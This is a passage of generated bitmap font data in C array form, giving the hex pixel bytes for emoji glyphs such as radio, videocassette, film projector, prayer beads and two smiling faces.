0xf0, 0xf, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x3f,
0x87, 0xe0, 0x7, 0xff, 0xff, 0xff, 0xff, 0x0,
0x7f, 0xf, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7c, 0x1f, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xdf, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x1f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
/* U+1F4FB "📻" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3f, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1f, 0xfe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xff, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7f, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3f, 0xff, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1f, 0xff, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x80, 0x0, 0x7, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0x0, 0x0, 0x7f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0xf,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xf8,
0x0, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xe0, 0x1f, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xc1, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1f, 0xf, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xe7, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf, 0x78, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3f, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xf8, 0x0, 0x0, 0x0, 0x7, 0xff,
0xff, 0xff, 0xfe, 0xf, 0xc1, 0xff, 0xff, 0xc0,
0x7f, 0xff, 0xff, 0xff, 0xfc, 0x7e, 0xf, 0xff,
0xfe, 0x7, 0xff, 0x7f, 0xff, 0xff, 0xe3, 0xf0,
0x0, 0x0, 0x0, 0x3f, 0xfb, 0xff, 0xff, 0xff,
0x1f, 0x80, 0x0, 0x0, 0x1, 0xe1, 0xdf, 0xe,
0x1c, 0x78, 0xfc, 0x0, 0x0, 0x0, 0xf, 0xe,
0xf8, 0x70, 0xe3, 0xc7, 0xe0, 0x0, 0x0, 0x0,
0x7f, 0xf7, 0xff, 0xff, 0xfe, 0x3f, 0x7, 0xff,
0xff, 0x3, 0xff, 0xbf, 0xff, 0xff, 0xf1, 0xf8,
0x3f, 0xff, 0xf8, 0x18, 0x0, 0x0, 0x0, 0x0,
0x8f, 0xc0, 0x0, 0x0, 0x0, 0xc0, 0x0, 0x0,
0x0, 0x4, 0x7e, 0x0, 0x0, 0x0, 0x7, 0xff,
0x7f, 0xff, 0xff, 0xe3, 0xf0, 0x0, 0x0, 0x0,
0x3f, 0xfb, 0xff, 0xff, 0xff, 0x1f, 0x80, 0x0,
0x0, 0x1, 0xff, 0xdf, 0xff, 0xff, 0xf8, 0xfc,
0x1f, 0xff, 0xfc, 0xf, 0xe6, 0xcf, 0xcf, 0x9f,
0xc7, 0xe0, 0xff, 0xff, 0xe0, 0x7f, 0xf7, 0xff,
0xff, 0xfe, 0x3f, 0x0, 0x0, 0x0, 0x3, 0xff,
0xbf, 0xff, 0xff, 0xf1, 0xf8, 0x0, 0x0, 0x0,
0x1f, 0xff, 0xff, 0xff, 0xff, 0x8f, 0xc0, 0x0,
0x0, 0x0, 0x7f, 0xff, 0xff, 0xff, 0xf8, 0x7e,
0xf, 0xff, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xf0, 0x7f, 0xff, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1f, 0x83, 0xff, 0xff, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0xf, 0x80, 0x0, 0xf8, 0x7, 0xe0, 0x0,
0x0, 0x0, 0x1, 0xff, 0x0, 0x1f, 0xf0, 0x3f,
0x0, 0x0, 0x0, 0x0, 0x1e, 0xfc, 0x1, 0xc3,
0xc1, 0xf8, 0x3f, 0xff, 0xf8, 0x0, 0xc6, 0x60,
0x1f, 0x6, 0xf, 0xc1, 0xff, 0xff, 0xc0, 0xc,
0x33, 0x80, 0xdc, 0x38, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x61, 0x8c, 0x6, 0x70, 0xc3, 0xf0, 0x0,
0x0, 0x0, 0x3, 0x8, 0x60, 0x71, 0x86, 0x1f,
0x80, 0x0, 0x0, 0x0, 0x18, 0x3, 0x1, 0x80,
0x30, 0xfc, 0x1f, 0xff, 0xfc, 0x0, 0xc0, 0x18,
0xc, 0x1, 0x87, 0xe0, 0xff, 0xff, 0xe0, 0x3,
0x1, 0x80, 0x70, 0x18, 0x3f, 0x7, 0xff, 0xff,
0x0, 0x1e, 0x1c, 0x1, 0xc3, 0xc1, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xc0, 0x7, 0xfc, 0xf,
0xc0, 0x0, 0x0, 0x0, 0x0, 0xf8, 0x0, 0xf,
0x80, 0x7e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xb8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x39, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xc7, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0x80,
/* U+1F4FC "📼" */
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xc0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xc7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x9f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xfe, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1f, 0xff, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7f, 0xfe, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xff,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xc3, 0x86, 0x0, 0x0, 0x18,
0x79, 0xff, 0xff, 0xfe, 0x1c, 0x78, 0x0, 0x0,
0x78, 0x77, 0xff, 0xff, 0xf0, 0x63, 0xe0, 0x0,
0x1, 0xf8, 0xd3, 0xff, 0xff, 0xc3, 0x1f, 0x80,
0x0, 0x7, 0xf1, 0xcf, 0xff, 0xfe, 0xc, 0xe7,
0xff, 0xff, 0xf9, 0xe7, 0x1f, 0xff, 0xf8, 0x67,
0x9f, 0xff, 0xff, 0xe3, 0x9c, 0x7f, 0xff, 0xe1,
0x9c, 0x7f, 0xff, 0xff, 0x87, 0x31, 0xff, 0xff,
0x86, 0x71, 0xff, 0xff, 0xfe, 0x1c, 0xc7, 0xff,
0xfe, 0x19, 0xc6, 0x0, 0x0, 0x18, 0x73, 0x1f,
0xff, 0xf8, 0x67, 0x18, 0x0, 0x0, 0x61, 0xcc,
0x7f, 0xff, 0xe1, 0x9e, 0x60, 0x0, 0x1, 0x8e,
0x31, 0xff, 0xff, 0x86, 0x39, 0x80, 0x0, 0x6,
0x79, 0xc7, 0xff, 0xfe, 0xc, 0x7e, 0x0, 0x0,
0x1f, 0xc6, 0x1f, 0xff, 0xfc, 0x30, 0xf8, 0x0,
0x0, 0x7e, 0x18, 0xff, 0xff, 0xf0, 0xe1, 0xe0,
0x0, 0x1, 0xe0, 0xc3, 0xff, 0xff, 0xe1, 0xc1,
0x80, 0x0, 0x6, 0x7, 0x1f, 0xff, 0xff, 0xc3,
0x86, 0x0, 0x0, 0x1c, 0x78, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xfe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xf7, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0x9f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x3f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x3f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0,
/* U+1F4FD "📽" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xff,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xc0,
0x3e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf,
0x3, 0x80, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe0, 0xff, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x6, 0x3, 0x8, 0x7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x62, 0x18, 0x81, 0x18, 0x0, 0x7, 0xf8,
0x0, 0x7, 0x38, 0x7c, 0x1c, 0x60, 0x1, 0xff,
0xf8, 0x0, 0x31, 0xe3, 0xc1, 0xf3, 0x80, 0x3c,
0x0, 0xf0, 0x3, 0x1b, 0xe, 0xd, 0x8c, 0x3,
0x81, 0x1, 0xe0, 0x19, 0x9c, 0x60, 0xc6, 0x60,
0x70, 0x7f, 0x83, 0x80, 0xc9, 0xf0, 0xf, 0x31,
0x87, 0x3, 0xc, 0xe, 0xc, 0x7f, 0x80, 0x7f,
0x8c, 0x30, 0xc, 0xc0, 0x38, 0x60, 0xfc, 0xf3,
0xe0, 0x63, 0x18, 0x7e, 0x18, 0xc3, 0x0, 0xf,
0xc0, 0x3, 0x31, 0xc1, 0xe0, 0xe3, 0x18, 0x0,
0x66, 0x0, 0x19, 0x8b, 0xf, 0xb, 0x98, 0xc0,
0x6, 0x30, 0x0, 0xd8, 0x8c, 0x30, 0xcc, 0x66,
0x3f, 0xf1, 0xbe, 0x6, 0xcc, 0xe0, 0x6, 0x33,
0x31, 0xff, 0x9d, 0xfe, 0x36, 0x7f, 0x80, 0x7f,
0x99, 0x8c, 0xf8, 0xcf, 0x71, 0xe3, 0xfc, 0x3,
0xfc, 0x66, 0x66, 0xc6, 0x33, 0x9f, 0x0, 0x67,
0x0, 0x3, 0x31, 0x3e, 0x70, 0xf8, 0xd8, 0x0,
0x7e, 0x0, 0x19, 0xc7, 0x63, 0x87, 0xc6, 0xc0,
0x3, 0x38, 0x0, 0xc6, 0x17, 0x1c, 0x1c, 0x66,
0x0, 0x18, 0xe0, 0x6, 0x38, 0x31, 0xe0, 0x47,
0x30, 0x4, 0x63, 0xc0, 0x30, 0xe1, 0x8f, 0x80,
0x71, 0x8f, 0xf3, 0x8f, 0xf1, 0x83, 0x1c, 0x64,
0x7, 0xc, 0x67, 0x8e, 0x1f, 0xff, 0xff, 0xff,
0xe0, 0x70, 0x33, 0x38, 0x7f, 0xff, 0xff, 0xff,
0xfc, 0x7, 0x1, 0x8d, 0x83, 0xf8, 0x0, 0x0,
0x0, 0xf8, 0xf0, 0xe, 0x7c, 0x3f, 0x0, 0x0,
0x0, 0x1, 0xfe, 0x0, 0x31, 0xc1, 0xf0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x1, 0xc4, 0x1f, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x0, 0x7, 0x0, 0xf8,
0x3, 0xff, 0xff, 0xe0, 0x70, 0x0, 0x1c, 0xf,
0x80, 0x7f, 0xff, 0xff, 0xc3, 0x80, 0x0, 0x70,
0x3c, 0x7, 0x80, 0x0, 0x1f, 0x1c, 0x0, 0x1,
0xc0, 0xe0, 0x78, 0x0, 0x0, 0x38, 0x70, 0x0,
0x7, 0x87, 0x3, 0x80, 0x0, 0x1, 0xe3, 0x80,
0x0, 0x1f, 0xf8, 0x1c, 0x0, 0x0, 0xf, 0x1c,
0x0, 0x0, 0x3f, 0xc0, 0xe0, 0x0, 0x0, 0x7f,
0xff, 0x0, 0x0, 0xe, 0x7, 0x0, 0x0, 0x3,
0xff, 0xfc, 0x0, 0x0, 0x70, 0x38, 0x0, 0x0,
0x1e, 0x0, 0xf0, 0x0, 0x3, 0x81, 0xc0, 0x0,
0x0, 0xf0, 0x3, 0x80, 0x0, 0x1c, 0xe, 0x0,
0x0, 0x7, 0x80, 0x1c, 0x0, 0x0, 0xe0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0xe0, 0x0, 0x7, 0x3,
0x80, 0x0, 0x1, 0xe0, 0x7, 0x0, 0x0, 0x38,
0x1c, 0x0, 0x0, 0xf, 0x0, 0x38, 0x0, 0x1,
0xc0, 0xe0, 0x0, 0x0, 0x78, 0x1, 0xc0, 0x0,
0xe, 0x7, 0x0, 0x0, 0x3, 0xc0, 0x1e, 0x0,
0x0, 0x70, 0x38, 0x0, 0x0, 0x1f, 0xff, 0xe0,
0x0, 0x3, 0x81, 0xc0, 0x0, 0x0, 0xff, 0xfe,
0x0, 0x0, 0x1c, 0xe, 0x0, 0x0, 0x7, 0x8e,
0x0, 0x0, 0x0, 0xe0, 0x70, 0x0, 0x0, 0x3c,
0x70, 0x0, 0x0, 0x7, 0x3, 0x80, 0x0, 0x1,
0xe3, 0x80, 0x0, 0x0, 0x38, 0x1e, 0x0, 0x0,
0xe, 0x1c, 0x0, 0x0, 0x1, 0xc0, 0x78, 0x0,
0x0, 0xf0, 0xe0, 0x0, 0x0, 0xe, 0x1, 0xff,
0xff, 0xff, 0x7, 0x0, 0x0, 0x0, 0x70, 0x7,
0xff, 0xff, 0xe0, 0x38, 0x0, 0x0, 0x3, 0x80,
0x0, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0,
0xe0, 0x0, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x0,
0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x0,
0x0, 0xf, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x0,
/* U+1F4FF "📿" */
0x0, 0x0, 0x0, 0x0, 0x3e, 0x7c, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1e, 0x7f, 0xef,
0xfc, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xe3, 0xc7, 0x8d, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x61, 0xc1, 0x83, 0x7, 0xc, 0x40, 0x0,
0x0, 0x0, 0x7, 0xc0, 0xc1, 0x83, 0x6, 0x7,
0xf0, 0x0, 0x0, 0x0, 0x1f, 0xc0, 0xc1, 0x83,
0x6, 0x7, 0x18, 0x0, 0x0, 0x0, 0x18, 0xe0,
0xe3, 0xef, 0x8e, 0x6, 0xc, 0x0, 0x0, 0x0,
0x30, 0xe1, 0xff, 0xff, 0xff, 0x6, 0xf, 0xc0,
0x0, 0x0, 0x30, 0x7f, 0xbe, 0x38, 0xf9, 0x9e,
0xf, 0xe0, 0x0, 0x1, 0xf0, 0x7f, 0x0, 0x0,
0x0, 0xfe, 0x1c, 0x30, 0x0, 0x7, 0xf0, 0x60,
0x0, 0x0, 0x0, 0x33, 0x18, 0x30, 0x0, 0x6,
0x38, 0xc0, 0x0, 0x0, 0x0, 0x3, 0xf8, 0x10,
0x0, 0xc, 0x1f, 0xc0, 0x0, 0x0, 0x0, 0x0,
0xf8, 0x30, 0x0, 0x2c, 0x1f, 0x80, 0x0, 0x0,
0x0, 0x0, 0x1c, 0x38, 0x0, 0xfc, 0x18, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf, 0xfc, 0x1, 0x86,
0x30, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xc6,
0x3, 0x7, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0x83, 0x3, 0x3, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0x83, 0x3, 0x3, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0x83, 0xf, 0x86,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc7,
0x1d, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xfe, 0x30, 0x78, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xfe, 0x30, 0x60, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xc6, 0x30, 0x60,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0x83,
0x30, 0x60, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0x83, 0x38, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0x83, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0x83, 0x7f, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc6,
0x63, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xfc, 0xc1, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x18, 0xc1, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x6, 0xc, 0xc1, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x6, 0xc,
0xe1, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x6, 0xc, 0x7f, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1e, 0xc, 0x3f, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x18, 0x39, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x73, 0xf8,
0x30, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe1, 0xe0, 0x60, 0x60, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xc0, 0xc0, 0x60, 0x60, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xc0, 0xc0, 0x30, 0x60,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xe0, 0xc0,
0x38, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x61, 0x80, 0x1f, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xf8, 0x7f, 0x80, 0xf, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xf8, 0x3e, 0x0, 0xc, 0x38,
0x0, 0x0, 0x0, 0x0, 0xe, 0x18, 0x30, 0x0,
0x18, 0x18, 0x0, 0x0, 0x0, 0x1e, 0xc, 0x1c,
0x70, 0x0, 0x18, 0x1c, 0x0, 0x0, 0x0, 0x3f,
0xc, 0x1f, 0xe0, 0x0, 0xc, 0x3f, 0x0, 0x0,
0x0, 0x63, 0xbc, 0x1f, 0xc0, 0x0, 0xc, 0x7f,
0x80, 0x0, 0xf, 0x61, 0xfe, 0x38, 0x0, 0x0,
0x7, 0xf1, 0xc0, 0x0, 0x1f, 0xc1, 0xff, 0xf0,
0x0, 0x0, 0x3, 0xe0, 0xc0, 0x0, 0x39, 0xc1,
0xc3, 0xe0, 0x0, 0x0, 0x0, 0xc0, 0xc0, 0x0,
0x30, 0xe1, 0x83, 0x0, 0x0, 0x0, 0x0, 0x60,
0xf0, 0x0, 0x30, 0x73, 0x83, 0x0, 0x0, 0x0,
0x0, 0x71, 0xfc, 0x3, 0xf0, 0x7f, 0x83, 0x0,
0x70, 0x0, 0x0, 0x3f, 0x8c, 0x47, 0x30, 0xc8,
0xe7, 0x81, 0xe0, 0x0, 0x0, 0x1f, 0x7, 0xfc,
0x1f, 0xc0, 0xff, 0xc3, 0x80, 0x0, 0x0, 0x3,
0x7, 0xfc, 0x1f, 0x80, 0x3f, 0xce, 0x0, 0x0,
0x0, 0x3, 0xe, 0x1c, 0x18, 0x0, 0x7, 0xfe,
0x0, 0x0, 0x0, 0x1, 0x8c, 0xc, 0x18, 0x0,
0x7, 0xff, 0xf0, 0x0, 0x0, 0x1, 0xfc, 0xe,
0x30, 0x0, 0x7, 0xff, 0xfc, 0x0, 0x0, 0x0,
0xfc, 0xf, 0xf0, 0x0, 0x6, 0xff, 0xf8, 0x0,
0x0, 0x0, 0x6, 0x1f, 0xc0, 0x0, 0x6, 0x3f,
0xf8, 0x0, 0x0, 0x0, 0x7, 0xf8, 0x0, 0x0,
0x2, 0x7, 0xf8, 0x0, 0x0, 0x0, 0x1, 0xf0,
0x0, 0x0, 0x3, 0xf, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf9, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x80, 0x0,
/* U+1F600 "😀" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0xff, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0xf, 0xc0, 0x0, 0x7, 0xe0, 0x0,
0x0, 0x0, 0xf, 0x0, 0x0, 0x0, 0x78, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0xf, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x78,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x78, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1e, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x7, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0xc3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x78, 0x0, 0x1,
0xe0, 0x0, 0x71, 0xc0, 0x0, 0x7e, 0x0, 0x1,
0xf8, 0x0, 0x1c, 0xe0, 0x0, 0x7f, 0x80, 0x1,
0xfe, 0x0, 0xe, 0x70, 0x0, 0x3f, 0xc0, 0x0,
0xff, 0x0, 0x7, 0x38, 0x0, 0x1f, 0xe0, 0x0,
0x7f, 0x80, 0x3, 0xb8, 0x0, 0xf, 0xf0, 0x0,
0x3f, 0xc0, 0x0, 0xfc, 0x0, 0x7, 0xf8, 0x0,
0x1f, 0xe0, 0x0, 0x7e, 0x0, 0x1, 0xf8, 0x0,
0x7, 0xe0, 0x0, 0x3f, 0x0, 0x0, 0x78, 0x0,
0x1, 0xe0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1d, 0xc0, 0x7f, 0x0,
0x0, 0x0, 0x7, 0xf0, 0x1c, 0xe0, 0x30, 0xfe,
0x0, 0x0, 0xff, 0xf8, 0xe, 0x70, 0x18, 0x0,
0xff, 0xff, 0xf0, 0xc, 0x7, 0x38, 0xe, 0x0,
0x0, 0x0, 0x0, 0xe, 0x3, 0x8e, 0x7, 0xfc,
0x0, 0x0, 0x0, 0xff, 0x3, 0x87, 0x1, 0xff,
0xff, 0xff, 0xff, 0xff, 0x1, 0xc3, 0xc0, 0xff,
0xff, 0xff, 0xff, 0xff, 0x81, 0xe0, 0xe0, 0x3f,
0xff, 0xff, 0xff, 0xff, 0x80, 0xe0, 0x78, 0xf,
0xff, 0xff, 0xff, 0xff, 0x80, 0xf0, 0x1c, 0x3,
0xff, 0xff, 0xff, 0xff, 0x80, 0x70, 0xf, 0x0,
0xff, 0xfc, 0xf, 0xff, 0x80, 0x78, 0x3, 0x80,
0x1f, 0xf0, 0x0, 0xff, 0x0, 0x38, 0x0, 0xe0,
0x7, 0xf0, 0x0, 0x3f, 0x0, 0x38, 0x0, 0x78,
0x0, 0xf8, 0x0, 0x1e, 0x0, 0x3c, 0x0, 0x1e,
0x0, 0xf, 0x80, 0x78, 0x0, 0x3c, 0x0, 0x7,
0x80, 0x0, 0x7f, 0xc0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0x1e, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x3, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F601 "😁" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
